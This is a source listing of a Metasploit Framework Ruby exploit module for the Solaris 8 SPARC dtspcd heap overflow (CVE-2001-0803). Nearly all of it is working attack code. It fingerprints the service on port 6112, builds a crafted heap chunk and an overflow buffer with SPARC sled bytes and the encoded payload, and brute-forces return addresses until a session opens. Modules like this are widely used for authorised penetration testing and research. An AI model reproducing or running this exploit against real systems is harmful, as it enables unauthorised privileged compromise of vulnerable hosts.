root / modules / exploits / solaris / dtspcd / heap_noir.rb @ master
History | View | Annotate | Download (3.6 kB)
| 1 |
##
|
|---|---|
| 2 |
# $Id$
|
| 3 |
##
|
| 4 |
|
| 5 |
##
|
| 6 |
# This file is part of the Metasploit Framework and may be subject to
|
| 7 |
# redistribution and commercial restrictions. Please see the Metasploit
|
| 8 |
# Framework web site for more information on licensing and terms of use.
|
| 9 |
# http://metasploit.com/framework/
|
| 10 |
##
|
| 11 |
|
| 12 |
require 'msf/core'
|
| 13 |
|
| 14 |
class Metasploit3 < Msf::Exploit::Remote |
| 15 |
Rank = GreatRanking |
| 16 |
|
| 17 |
include Msf::Exploit::Remote::Tcp |
| 18 |
|
| 19 |
def initialize(info = {}) |
| 20 |
super(update_info(info,
|
| 21 |
'Name' => 'Solaris dtspcd Heap Overflow', |
| 22 |
'Description' => %q{ |
| 23 |
This is a port of noir's dtspcd exploit. This module should |
| 24 |
work against any vulnerable version of Solaris 8 (sparc). |
| 25 |
The original exploit code was published in the book |
| 26 |
Shellcoder's Handbook. |
| 27 |
},
|
| 28 |
'Author' => [ 'noir <noir[at]uberhax0r.net>', 'hdm' ], |
| 29 |
'License' => MSF_LICENSE, |
| 30 |
'Version' => '$Revision$', |
| 31 |
'References' =>
|
| 32 |
[ |
| 33 |
[ 'CVE', '2001-0803'], |
| 34 |
[ 'OSVDB', '4503'], |
| 35 |
[ 'BID', '3517'], |
| 36 |
[ 'URL', 'http://www.cert.org/advisories/CA-2001-31.html'], |
| 37 |
[ 'URL', 'http://media.wiley.com/product_ancillary/83/07645446/DOWNLOAD/Source_Files.zip'], |
| 38 |
|
| 39 |
], |
| 40 |
'Privileged' => true, |
| 41 |
'Payload' =>
|
| 42 |
{
|
| 43 |
'Space' => 800, |
| 44 |
'BadChars' => "\x00\x0d", |
| 45 |
'PrependEncoder' => ("\xa4\x1c\x40\x11" * 3), |
| 46 |
}, |
| 47 |
'Platform' => 'solaris', |
| 48 |
'Arch' => ARCH_SPARC, |
| 49 |
'Targets' =>
|
| 50 |
[ |
| 51 |
['Solaris 8',
|
| 52 |
{ 'Rets' =>
|
| 53 |
[0xff3b0000, 0x2c000, 0x2f000, 0x400, [ 0x321b4, 0x361d8, 0x361e0, 0x381e8 ] ] |
| 54 |
} |
| 55 |
], |
| 56 |
], |
| 57 |
'DisclosureDate' => 'Jul 10 2002', |
| 58 |
'DefaultTarget' => 0)) |
| 59 |
|
| 60 |
register_options( |
| 61 |
[ |
| 62 |
Opt::RPORT(6112) |
| 63 |
], self.class)
|
| 64 |
end
|
| 65 |
|
| 66 |
|
| 67 |
def exploit |
| 68 |
return if not dtspcd_uname() |
| 69 |
|
| 70 |
target['Rets'][4].each do |tjmp| |
| 71 |
|
| 72 |
rbase = target['Rets'][1] |
| 73 |
|
| 74 |
while (rbase < target['Rets'][2]) do |
| 75 |
break if session_created? |
| 76 |
begin
|
| 77 |
print_status(sprintf("Trying 0x%.8x 0x%.8x...", target['Rets'][0] + tjmp, rbase)) |
| 78 |
attack(target['Rets'][0] + tjmp, rbase, payload.encoded) |
| 79 |
break if session_created? |
| 80 |
|
| 81 |
attack(target['Rets'][0] + tjmp, rbase + 4, payload.encoded) |
| 82 |
rbase += target['Rets'][3] |
| 83 |
rescue EOFError |
| 84 |
end
|
| 85 |
end
|
| 86 |
end
|
| 87 |
|
| 88 |
handler |
| 89 |
disconnect |
| 90 |
end
|
| 91 |
|
| 92 |
def check |
| 93 |
return Exploit::CheckCode::Detected if dtspcd_uname() |
| 94 |
return Exploit::CheckCode::Safe |
| 95 |
end
|
| 96 |
|
| 97 |
def dtspcd_uname |
| 98 |
spc_connect() |
| 99 |
spc_write(spc_register('root', "\x00"), 4) |
| 100 |
host, os, ver, arch = spc_read().gsub("\x00", '').split(':') |
| 101 |
|
| 102 |
return false if not host |
| 103 |
|
| 104 |
print_status("Detected dtspcd running #{os} v#{ver} on #{arch} hardware")
|
| 105 |
spc_write("", 2) |
| 106 |
return true |
| 107 |
end
|
| 108 |
|
| 109 |
|
| 110 |
def chunk_create(retloc, retadd) |
| 111 |
"\x12\x12\x12\x12" +
|
| 112 |
[retadd].pack('N')+
|
| 113 |
"\x23\x23\x23\x23\xff\xff\xff\xff" +
|
| 114 |
"\x34\x34\x34\x34\x45\x45\x45\x45" +
|
| 115 |
"\x56\x56\x56\x56" +
|
| 116 |
[retloc - 8].pack('N') |
| 117 |
end
|
| 118 |
|
| 119 |
|
| 120 |
def attack(retloc, retadd, fcode) |
| 121 |
spc_connect() |
| 122 |
|
| 123 |
begin
|
| 124 |
buf = ("\xa4\x1c\x40\x11\x20\xbf\xff\xff" * ((4096 - 8 - fcode.length) / 8)) + fcode |
| 125 |
buf << "\x00\x00\x10\x3e\x00\x00\x00\x14"
|
| 126 |
buf << "\x12\x12\x12\x12\xff\xff\xff\xff"
|
| 127 |
buf << "\x00\x00\x0f\xf4"
|
| 128 |
buf << chunk_create(retloc, retadd) |
| 129 |
buf << "X" * ((0x103e - 8) - buf.length) |
| 130 |
|
| 131 |
spc_write(spc_register("", buf), 4) |
| 132 |
|
| 133 |
handler |
| 134 |
|
| 135 |
rescue EOFError |
| 136 |
end
|
| 137 |
end
|
| 138 |
|
| 139 |
|
| 140 |
def spc_register(user='', buff='') |
| 141 |
"4 \x00#{user}\x00\x0010\x00#{buff}"
|
| 142 |
end
|
| 143 |
|
| 144 |
def spc_write(buff = '', cmd='') |
| 145 |
sock.put(sprintf("%08x%02x%04x%04x %s", 2, cmd, buff.length, (@spc_seq += 1), buff)) |
| 146 |
end
|
| 147 |
|
| 148 |
def spc_read |
| 149 |
# Bytes: 0-9 = channel, 9-10 = cmd, 10-13 = mbl, 14-17 = seq
|
| 150 |
head = sock.get_once(20)
|
| 151 |
sock.get_once( head[10, 13].hex ) || '' |
| 152 |
end
|
| 153 |
|
| 154 |
def spc_connect |
| 155 |
disconnect |
| 156 |
connect |
| 157 |
@spc_seq = 0 |
| 158 |
end
|
| 159 |
|
| 160 |
end
|